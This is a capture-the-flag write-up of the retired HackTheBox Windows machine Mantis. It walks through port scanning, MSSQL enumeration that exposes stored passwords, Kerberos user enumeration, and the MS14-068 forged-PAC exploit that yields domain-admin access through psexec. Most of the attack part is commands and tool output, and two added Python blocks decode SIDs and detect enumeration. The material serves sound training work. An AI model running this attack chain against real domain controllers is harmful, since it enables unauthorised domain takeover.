Mantis - HackTheBox - Windows Box

This writeup is for one of the Retired boxes on HackTheBox called Mantis [1].

Step 1 - Recon

I started my reconnaissance with Nmap, UDP Proto Scanner, Nikto and Dirbuster. Starting with Nmap on host 10.10.10.52, we have:

nmap -sS -A -T5 --top-ports 1000 10.10.10.52

Host is up (0.039s latency).
Not shown: 685 closed ports, 299 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2018-01-18 16:05:34Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
1337/tcp  open  waste
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-01-18T06:55:10
|_Not valid after:  2048-01-18T06:55:10
|_ssl-date: 2018-01-18T16:06:33+00:00; 0s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC

From Nmap we can see that there are two HTTP ports open, 1337 and 8080. Using Dirbuster with the directory-list-2.3-medium.txt list on port 1337, we find two directories:

 /orchard/
 /secure_notes/

On port 8080 we have:

 /blogs
 /admin
 /tags
 /Archive
 /pollArchive
 /Blogs
 /newsarchive
 /news_archive
 /Admin

Output from Nikto on both ports:

 Port 8080

 + Server: Microsoft-IIS/7.5
 + Retrieved x-aspnet-version header: 4.0.30319
 + Retrieved x-powered-by header: ASP.NET
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + Uncommon header 'x-generator' found, with contents: Orchard
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
 + OSVDB-3092: /archive/a_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
 + OSVDB-3092: /archive/l_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
 + 7448 requests: 0 error(s) and 9 item(s) reported on remote host

 Port 1337

 + Server: Microsoft-IIS/7.5
 + Retrieved x-powered-by header: ASP.NET
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + Retrieved x-aspnet-version header: 2.0.50727
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
 + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
 + /: Appears to be a default IIS 7 install.

Step 2 - Exploitation

Accessing http://mantis.htb:1337/secure_notes/ I found:

 /dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
 /web.config

There is a base64-encoded string in the name of the first file:

 echo -n NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 --decode
 6d2424716c5f53405f504073735730726421

 echo -n 6d2424716c5f53405f504073735730726421 | xxd -r -ps
 m$$ql_S@_P@ssW0rd!

So, I have a password and, based on the contents, it is probably the admin's password for the MS-SQL service running on the box.

Now that we have a username and password, let's enumerate the MSSQL server with Metasploit's enumeration module [2,3].

 Enumerate mssql

 msf auxiliary(mssql_enum)> run

 [*] 10.10.10.52:1433 - Running MS SQL Server Enumeration...
 [*] 10.10.10.52:1433 - Version:
 [*]	Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
 [*]		Feb 20 2014 20:04:26
 [*]		Copyright (c) Microsoft Corporation
 [*]		Express Edition (64-bit) on Windows NT 6.1  (Build 7601: Service Pack 1) (Hypervisor)
 [*] 10.10.10.52:1433 - Configuration Parameters:
 [*] 10.10.10.52:1433 - 	C2 Audit Mode is Not Enabled
 [*] 10.10.10.52:1433 - 	xp_cmdshell is Not Enabled
 [*] 10.10.10.52:1433 - 	remote access is Enabled
 [*] 10.10.10.52:1433 - 	allow updates is Not Enabled
 [*] 10.10.10.52:1433 - 	Database Mail XPs is Not Enabled
 [*] 10.10.10.52:1433 - 	Ole Automation Procedures are Not Enabled
 [*] 10.10.10.52:1433 - Databases on the server:
 [*] 10.10.10.52:1433 - 	Database name:master
 [*] 10.10.10.52:1433 - 	Database Files for master:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\master.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\mastlog.ldf
 [*] 10.10.10.52:1433 - 	Database name:tempdb
 [*] 10.10.10.52:1433 - 	Database Files for tempdb:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\tempdb.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\templog.ldf
 [*] 10.10.10.52:1433 - 	Database name:model
 [*] 10.10.10.52:1433 - 	Database Files for model:
 [*] 10.10.10.52:1433 - 	Database name:msdb
 [*] 10.10.10.52:1433 - 	Database Files for msdb:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\MSDBData.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\MSDBLog.ldf
 [*] 10.10.10.52:1433 - 	Database name:orcharddb
 [*] 10.10.10.52:1433 - 	Database Files for orcharddb:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\orcharddb.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\orcharddb_log.ldf
 [*] 10.10.10.52:1433 - System Logins on this Server:
 [*] 10.10.10.52:1433 - 	sa
 [*] 10.10.10.52:1433 - 	admin
 [*] 10.10.10.52:1433 - Disabled Accounts:
 [*] 10.10.10.52:1433 - 	No Disabled Logins Found
 [*] 10.10.10.52:1433 - No Accounts Policy is set for:
 [*] 10.10.10.52:1433 - 	All System Accounts have the Windows Account Policy Applied to them.
 [*] 10.10.10.52:1433 - Password Expiration is not checked for:
 [*] 10.10.10.52:1433 - 	sa
 [*] 10.10.10.52:1433 - 	admin
 [*] 10.10.10.52:1433 - System Admin Logins on this Server:
 [*] 10.10.10.52:1433 - 	sa
 [*] 10.10.10.52:1433 - Windows Logins on this Server:
 [*] 10.10.10.52:1433 - 	No Windows logins found!
 [*] 10.10.10.52:1433 - Windows Groups that can logins on this Server:
 [*] 10.10.10.52:1433 - 	No Windows Groups where found with permission to login to system.
 [*] 10.10.10.52:1433 - Accounts with Username and Password being the same:
 [*] 10.10.10.52:1433 - 	No Account with its password being the same as its username was found.
 [*] 10.10.10.52:1433 - Accounts with empty password:
 [*] 10.10.10.52:1433 - 	No Accounts with empty passwords where found.
 [*] 10.10.10.52:1433 - Stored Procedures with Public Execute Permission found:
 [*] 10.10.10.52:1433 - 	sp_replsetsyncstatus
 [*] 10.10.10.52:1433 - 	sp_replcounters
 [*] 10.10.10.52:1433 - 	sp_replsendtoqueue
 [*] 10.10.10.52:1433 - 	sp_resyncexecutesql
 [*] 10.10.10.52:1433 - 	sp_prepexecrpc
 [*] 10.10.10.52:1433 - 	sp_repltrans
 [*] 10.10.10.52:1433 - 	sp_xml_preparedocument
 [*] 10.10.10.52:1433 - 	xp_qv
 [*] 10.10.10.52:1433 - 	xp_getnetname
 [*] 10.10.10.52:1433 - 	sp_releaseschemalock
 [*] 10.10.10.52:1433 - 	sp_refreshview
 [*] 10.10.10.52:1433 - 	sp_replcmds
 [*] 10.10.10.52:1433 - 	sp_unprepare
 [*] 10.10.10.52:1433 - 	sp_resyncprepare
 [*] 10.10.10.52:1433 - 	sp_createorphan
 [*] 10.10.10.52:1433 - 	xp_dirtree
 [*] 10.10.10.52:1433 - 	sp_replwritetovarbin
 [*] 10.10.10.52:1433 - 	sp_replsetoriginator
 [*] 10.10.10.52:1433 - 	sp_xml_removedocument
 [*] 10.10.10.52:1433 - 	sp_repldone
 [*] 10.10.10.52:1433 - 	sp_reset_connection
 [*] 10.10.10.52:1433 - 	xp_fileexist
 [*] 10.10.10.52:1433 - 	xp_fixeddrives
 [*] 10.10.10.52:1433 - 	sp_getschemalock
 [*] 10.10.10.52:1433 - 	sp_prepexec
 [*] 10.10.10.52:1433 - 	xp_revokelogin
 [*] 10.10.10.52:1433 - 	sp_resyncuniquetable
 [*] 10.10.10.52:1433 - 	sp_replflush
 [*] 10.10.10.52:1433 - 	sp_resyncexecute
 [*] 10.10.10.52:1433 - 	xp_grantlogin
 [*] 10.10.10.52:1433 - 	sp_droporphans
 [*] 10.10.10.52:1433 - 	xp_regread
 [*] 10.10.10.52:1433 - 	sp_getbindtoken
 [*] 10.10.10.52:1433 - 	sp_replincrementlsn
 [*] 10.10.10.52:1433 - Instances found on this server:
 [*] 10.10.10.52:1433 - Default Server Instance SQL Server Service is running under the privilege of:
 [*] 10.10.10.52:1433 - 	xp_regread might be disabled in this system
 [*] Auxiliary module execution completed

... and more enum ...

 use auxiliary/admin/mssql/mssql_enum_domain_accounts

 Attempting to connect to the database server at 10.10.10.52:1433 as admin...
 [+] 10.10.10.52:1433 - Connected.
 [*] 10.10.10.52:1433 - SQL Server Name: MANTIS
 [*] 10.10.10.52:1433 - Domain Name: HTB
 [+] 10.10.10.52:1433 - Found the domain sid: 0105000000000005150000008cc188fb194b8eef799898ac
 [*] 10.10.10.52:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
 [*] 10.10.10.52:1433 -  - HTB\Administrator
 [*] 10.10.10.52:1433 -  - HTB\Guest
 [*] 10.10.10.52:1433 -  - HTB\krbtgt
 [*] 10.10.10.52:1433 -  - HTB\Domain Admins
 [*] 10.10.10.52:1433 -  - HTB\Domain Users
 [*] 10.10.10.52:1433 -  - HTB\Domain Guests
 [*] 10.10.10.52:1433 -  - HTB\Domain Computers
 [*] 10.10.10.52:1433 -  - HTB\Domain Controllers
 [*] 10.10.10.52:1433 -  - HTB\Cert Publishers
 [*] 10.10.10.52:1433 -  - HTB\Schema Admins
 [*] 10.10.10.52:1433 -  - HTB\Enterprise Admins
 [*] 10.10.10.52:1433 -  - HTB\Group Policy Creator Owners
 [*] 10.10.10.52:1433 -  - HTB\Read-only Domain Controllers
 [*] 10.10.10.52:1433 -  - HTB\RAS and IAS Servers
 [*] 10.10.10.52:1433 -  - HTB\Allowed RODC Password Replication Group
 [*] 10.10.10.52:1433 -  - HTB\Denied RODC Password Replication Group
 [*] 10.10.10.52:1433 -  - HTB\MANTIS$
 [*] 10.10.10.52:1433 -  - HTB\DnsAdmins
 [*] 10.10.10.52:1433 -  - HTB\DnsUpdateProxy
 [*] 10.10.10.52:1433 -  - HTB\james
 [*] 10.10.10.52:1433 -  - HTB\SQLServer2005SQLBrowserUser$MANTIS
 [+] 10.10.10.52:1433 - 22 user accounts, groups, and computer accounts were found.
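
The hex string reported above as the domain SID is the standard binary SID layout: revision, sub-authority count, 48-bit big-endian authority, then 32-bit little-endian sub-authorities. The following added example (not part of the original writeup or of Metasploit; the function names are illustrative) decodes it and shows that it is the domain part of the SID that rpcclient returns for james later on this page.

```python
import struct

# Values copied from the tool output on this page.
HEX_FROM_MSSQL = "0105000000000005150000008cc188fb194b8eef799898ac"
JAMES_SID = "S-1-5-21-4220043660-4019079961-2895681657-1103"


def parse_sid_hex(hex_sid):
    """Decode a binary SID given as hex. Returns (sid_string, declared, present)."""
    if hex_sid.lower().startswith("0x"):
        hex_sid = hex_sid[2:]
    raw = bytes.fromhex(hex_sid)
    if len(raw) < 8:
        raise ValueError("a SID needs an 8-byte header")
    revision, declared = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")      # 48-bit, big-endian
    body = raw[8:]
    if len(body) % 4:
        raise ValueError("sub-authorities are 4 bytes each")
    present = len(body) // 4
    if present > declared:
        raise ValueError("more sub-authorities than the header declares")
    subs = struct.unpack("<%dI" % present, body)     # 32-bit, little-endian
    sid = "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs])
    return sid, declared, present


def encode_sid(sid):
    """Encode an S-R-A-... string as the hex of its binary form."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    raw = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    raw += struct.pack("<%dI" % len(subs), *subs)
    return raw.hex()


def split_rid(sid):
    """Return (domain_sid, rid) for an account SID."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


if __name__ == "__main__":
    sid, declared, present = parse_sid_hex(HEX_FROM_MSSQL)
    print(sid, "declared=%d present=%d" % (declared, present))
    print(split_rid(JAMES_SID))
    print(encode_sid(JAMES_SID))
```

The header declares five sub-authorities while only four are present, which is what a full account or group SID looks like once its trailing RID has been cut off; appending a 4-byte little-endian RID (1103 is `4f040000`) gives the complete binary SID for james.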

Using auxiliary/admin/mssql/mssql_sql from Metasploit we can run queries against the MSSQL service.

 msf > set sql SELECT name FROM master..sysdatabases;

 msf auxiliary(mssql_sql) > exploit

 [*] 10.10.10.52:1433 - SQL Query: SELECT name FROM master..sysdatabases;
 [*] 10.10.10.52:1433 - Row Count: 5 (Status: 16 Command: 193)

  name
  ----
  master
  tempdb
  model
  msdb
  orcharddb

 msf > set sql USE orcharddb; SELECT * FROM information_schema.tables;
 msf > set sql USE orcharddb; SELECT * FROM blog_Orchard_Users_UserPartRecord;
 msf > set sql "USE orcharddb; SELECT *  FROM information_schema.columns WHERE table_name='blog_Orchard_Users_UserPartRecord';"
 msf > set sql "USE orcharddb; SELECT UserName FROM blog_Orchard_Users_UserPartRecord;"

  UserName
  --------
  admin
  James

 msf > set sql "USE orcharddb; SELECT Password FROM blog_Orchard_Users_UserPartRecord;"

  Password
  --------
  AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
  J@m3s_P@ssW0rd!

 msf > set sql "USE orcharddb; SELECT UserName, Password, HashAlgorithm, PasswordSalt FROM blog_Orchard_Users_UserPartRecord;"

  UserName  Password                                                              HashAlgorithm  PasswordSalt
  --------  --------                                                              -------------  ------------
  admin     AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==  PBKDF2         UBwWF1CQCsaGc/P7jIR/kg==
  James     J@m3s_P@ssW0rd!                                                       Plaintext      NA

I changed the admin's password to something simpler and then tried to log in to the Orchard CMS login portal, but there was not anything helpful in there. However, I have the user James's password, and just to validate whether it is his domain credentials we can try:

 smbexec.py htb.local/james:'J@m3s_P@ssW0rd!'@10.10.10.52
 [-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

  use auxiliary/scanner/smb/smb_login
  msf auxiliary(smb_login) > set smbuser james
  msf auxiliary(smb_login) > set smbpass J@m3s_P@ssW0rd!
  msf auxiliary(smb_login) > set rhosts 10.10.10.52
  msf auxiliary(smb_login) > set smbdomain htb.local
  msf auxiliary(smb_login) > exploit

  [*] 10.10.10.52:445       - SMB - Starting SMB login bruteforce
  [*] 10.10.10.52:445       - This system does not accept authentication with any credentials, proceeding with brute force
  [+] 10.10.10.52:445       - SMB - Success: 'htb.local\james:J@m3s_P@ssW0rd!'
  [*] 10.10.10.52:445       - SMB - Domain is ignored for user james
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

So, we have user James's domain credentials, but the SMB exploit cannot be used to gain access to the system. I then moved to the other services open on the box and tried to exploit the Kerberos authentication.

 use auxiliary/gather/kerberos_enumusers (Domain: htb.local)

 msf auxiliary(kerberos_enumusers) > set domain htb.local
 msf auxiliary(kerberos_enumusers) > set rhost 10.10.10.52
 msf auxiliary(kerberos_enumusers) > set user_file ~/Downloads/mantis/kerberos
 msf auxiliary(kerberos_enumusers) > exploit

 [*] Validating options...
 [*] Using domain: HTB.LOCAL...
 [*] 10.10.10.52:88 - Testing User: "admin"...
 [*] 10.10.10.52:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
 [*] 10.10.10.52:88 - User: "admin" does not exist
 [*] 10.10.10.52:88 - Testing User: "james"...
 [*] 10.10.10.52:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
 [+] 10.10.10.52:88 - User: "james" is present
 [*] 10.10.10.52:88 - Testing User: "administrator"...
 [*] 10.10.10.52:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
 [+] 10.10.10.52:88 - User: "administrator" is present
 [*] 10.10.10.52:88 - Testing User: "mantis"...
 [*] 10.10.10.52:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
 [+] 10.10.10.52:88 - User: "mantis" is present



 java -jar krbguess.jar -r htb.local -d ~/Downloads/mantis/kerberos -s 10.10.10.52
 KrbGuess v0.21 by Patrik Karlsson 
 ====================================================
 [INF] Found user: james@htb.local
 [INF] Found user: mantis@htb.local
 [INF] Found user: administrator@htb.local
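
The output above shows why this works: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for names that do not exist and KDC_ERR_PREAUTH_REQUIRED for names that do. On the domain controller, TGT requests for unknown names are recorded as event 4768 with result code 0x6, so the added example below (not from the original writeup) flags a client that requests many distinct unknown principals in a short window. The one-line log format, the addresses and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

PRINCIPAL_UNKNOWN = 0x6  # KDC_ERR_C_PRINCIPAL_UNKNOWN as a 4768 result code
LINE = re.compile(r"^(?P<ts>\S+) event=(?P<eid>\d+) client=(?P<client>\S+) "
                  r"account=(?P<account>\S+) result=(?P<code>0x[0-9a-fA-F]+)$")

# Constructed sample: a simplified one-line rendering of 4768 events,
# not the native Windows event format.
SAMPLE = """\
2018-02-06T10:40:00 event=4768 client=192.0.2.50 account=svc_backup result=0x0
2018-02-06T10:40:01 event=4768 client=192.0.2.10 account=admin result=0x6
2018-02-06T10:40:01 event=4768 client=192.0.2.10 account=root result=0x6
2018-02-06T10:40:02 event=4768 client=192.0.2.10 account=test result=0x6
2018-02-06T10:40:02 event=4768 client=192.0.2.77 account=jmaes result=0x6
2018-02-06T10:40:03 event=4768 client=192.0.2.10 account=backup result=0x6
2018-02-06T10:40:03 event=4768 client=192.0.2.10 account=helpdesk result=0x6
2018-02-06T10:40:09 event=4768 client=192.0.2.77 account=james result=0x0
2018-02-06T10:52:00 event=4768 client=192.0.2.10 account=guest1 result=0x6
"""


def parse(lines):
    """Yield (time, client, account, result_code) for each 4768 line."""
    for line in lines:
        m = LINE.match(line.strip())
        if m and m["eid"] == "4768":
            yield (datetime.fromisoformat(m["ts"]), m["client"],
                   m["account"].lower(), int(m["code"], 16))


def find_enumeration(lines, window=timedelta(seconds=60), threshold=5):
    """Return {client: sorted unknown names} for every client that asked for
    at least `threshold` distinct unknown principals within `window`."""
    recent = defaultdict(deque)   # client -> (time, account) inside the window
    flagged = defaultdict(set)
    for ts, client, account, code in sorted(parse(lines)):
        if code != PRINCIPAL_UNKNOWN:
            continue
        q = recent[client]
        q.append((ts, account))
        while ts - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        names = {a for _, a in q}
        if len(names) >= threshold:
            flagged[client] |= names
    return {c: sorted(n) for c, n in flagged.items()}


if __name__ == "__main__":
    for client, names in find_enumeration(SAMPLE.splitlines()).items():
        print(client, names)
```

A single mistyped name (192.0.2.77 in the sample) stays below the threshold, and the late `guest1` request falls outside the window, so neither is reported.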

 use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
 msf auxiliary(ms14_068_kerberos_checksum) > show options

 Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
    PASSWORD                   yes       The Domain User password
    RHOST                      yes       The target address
    RPORT     88               yes       The target port
    Timeout   10               yes       The TCP timeout to establish connection and read data
    USER                       yes       The Domain User
    USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

 msf auxiliary(ms14_068_kerberos_checksum) > set domain htb.local
 msf auxiliary(ms14_068_kerberos_checksum) > set user james
 msf auxiliary(ms14_068_kerberos_checksum) > set password J@m3s_P@ssW0rd!
 msf auxiliary(ms14_068_kerberos_checksum) > set rhost 10.10.10.52

 Use rpcclient to find user's SID

 rpcclient 10.10.10.52 -W htb.local -U james
 Enter HTB.LOCAL\james's password:
 rpcclient $> lookupnames james
 james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

 msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-4220043660-4019079961-2895681657-1103
 msf auxiliary(ms14_068_kerberos_checksum) > exploit

 [*] Validating options...
 [*] Using domain HTB.LOCAL...
 [*] 10.10.10.52:88 - Sending AS-REQ...
 [*] 10.10.10.52:88 - Parsing AS-REP...
 [*] 10.10.10.52:88 - Sending TGS-REQ...
 [+] 10.10.10.52:88 - Valid TGS-Response, extracting credentials...
 [+] 10.10.10.52:88 - MIT Credential Cache saved on /root/.msf4/loot/20180206105619_default_10.10.10.52_windows.kerberos_865929.bin
 [*] Auxiliary module execution completed

Based on what we found so far, the exploit to use is the MS14-068 forged PAC exploit, which targets the Kerberos vulnerability on Domain Controllers [4,5,6]. This exploit allows an attacker to become a Domain Administrator with any user account. The steps were taken from [7].

Steps to Exploit MS14-068

 1. apt-get install krb5-user cifs-utils git

 2. net time -S 10.10.10.52 -U "james"
 Tue Feb  6 11:42:48 2018
 (Check if time is the same)

 3. root@kali:~/.msf4/loot# mv /etc/krb5.conf /etc/backup_krb5.conf

 cat /etc/krb5.conf

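 [libdefaults]
 	# the realm is the upper-cased AD domain, not the KDC's hostname
 	default_realm = HTB.LOCAL
 	dns_lookup_realm = true
 	dns_lookup_kdc = true

 [realms]
 	# the stanza name must match the realm used by kinit and [domain_realm]
 	HTB.LOCAL = {
 		kdc = MANTIS.HTB.LOCAL:88
 		admin_server = MANTIS.HTB.LOCAL
 		default_domain = htb.local
 	}
 [domain_realm]
 	.htb.local	= HTB.LOCAL
 	htb.local	= HTB.LOCAL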

 4. cat /etc/hosts

 10.10.10.52	mantis.htb mantis.htb.local mantis

 5. cat /etc/resolv.conf
 nameserver 10.10.10.52
 nameserver 10.2...

 6. kinit or kinit james@HTB.LOCAL
 kinit USER@TARGET.LOCAL

 #get exploits from https://github.com/bidord/pykek

 7. Find User's SID
 S-1-5-21-4220043660-4019079961-2895681657-1103

 8. run exploit
 python ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local

 9. move modified creds to the location where they can be used by local kerberos
 mv TGT_*.ccache /tmp/krb5cc_0

 #### https://artkond.com/2016/12/18/pivoting-kerberos/

 10. export KRB5CCNAME='/tmp/krb5cc_0'

 11. https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

 psexec.py -k -n htb.local/james@mantis cmd
 -k === Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line




References

[1] HackTheBox
[2] Attacking MS-SQL with Metasploit
[3] Pentest Microsoft SQL Server
[4] Exploiting MS014-068
[5] Exploiting MS14-068 Vulnerable Domain Controllers using PyKEK
[6] MS14-068 Vulnerability
[7] Exploit MS014-068